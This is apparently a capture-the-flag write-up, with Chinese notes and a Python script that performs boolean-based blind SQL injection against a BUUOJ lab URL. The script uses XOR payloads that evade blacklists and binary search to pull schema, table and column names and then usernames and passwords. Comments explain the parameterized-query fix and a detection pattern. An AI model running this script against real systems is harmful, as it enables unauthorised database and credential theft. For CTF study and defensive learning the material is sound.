知识点:
当过滤的东西很多的时候,可以考虑盲注,用 ^ 来判断是否存在注入;
1^1^1=0 1^1^0=1;
以爆库名为例:
ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d
使用二分法查找数据库的每一个字母;具体脚本如下:
到时候只需要改回显的关键字和url就行
import requests
import time
# Boolean-based blind SQL injection oracle used in the writeup above.
# Each request sends one boolean expression in the `id` parameter; the only
# feedback the page gives back is whether the string "Click" appears in the body.
url = "http://03251dcb-c0cc-4894-97d2-a9510b3705ab.node4.buuoj.cn:81/search.php"
temp = {"id": ""}  # query-string parameters passed to requests.get; only "id" is used
column = ""  # characters recovered so far, one appended per outer iteration

# Outer loop: i is the 1-based position (as substr() expects) of the byte being read.
# 1000 is only an upper bound; the loop normally ends via the `break` below.
for i in range(1, 1000):
    time.sleep(0.06)  # fixed pause between characters; presumably pacing — no other purpose visible here
    # Binary search over the ASCII range [32, 128) for the byte at position i.
    low = 32
    high = 128
    mid = (low + high) // 2
    while (low < high):
        # Alternative payloads kept for reference: same oracle, different target string.
        # schema names (库名)
        # temp["id"] = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" %(i,mid)
        # table names (表名)
        # temp["id"] = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)^1" %(i,mid)
        # column names (字段名)
        # temp["id"] = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1" %(i,mid)
        # row contents (内容)
        # The payload has the shape `1^(cond)^1`; because 1^1 = 0 the whole expression
        # evaluates to `cond` itself, i.e. the query matches exactly when ascii(char_i) > mid.
        # No spaces or boolean keywords are used (parentheses separate every token),
        # which is why this form survives a space/keyword blacklist — the server-side
        # fix is a parameterized query, not a longer blacklist.
        temp["id"] = "1^(ascii(substr((select(group_concat(id,username,password))from(F1naI1y)),%d,1))>%d)^1" % (i, mid)
        r = requests.get(url, params=temp)
        time.sleep(0.04)  # second fixed pause, after every request
        print(low, high, mid, ":")  # progress trace of the current search bounds
        # Oracle: "Click" present in the response means the condition was true (char > mid).
        if "Click" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    # Defender's note: on the server this traffic is distinctive — hundreds of sequential
    # requests to one endpoint whose `id` differs only in two integers (position and
    # threshold) that narrow monotonically; a log/WAF rule on that pattern detects it.
    # Search bottomed out at 32 (nothing greater than a space ever matched, e.g. when
    # substr() returned '' past the end of the data) or topped out at 127: treated as
    # end of string.
    if (mid == 32 or mid == 127):
        break
    column += chr(mid)
    print(column)  # partial result so far
print("All:", column)
#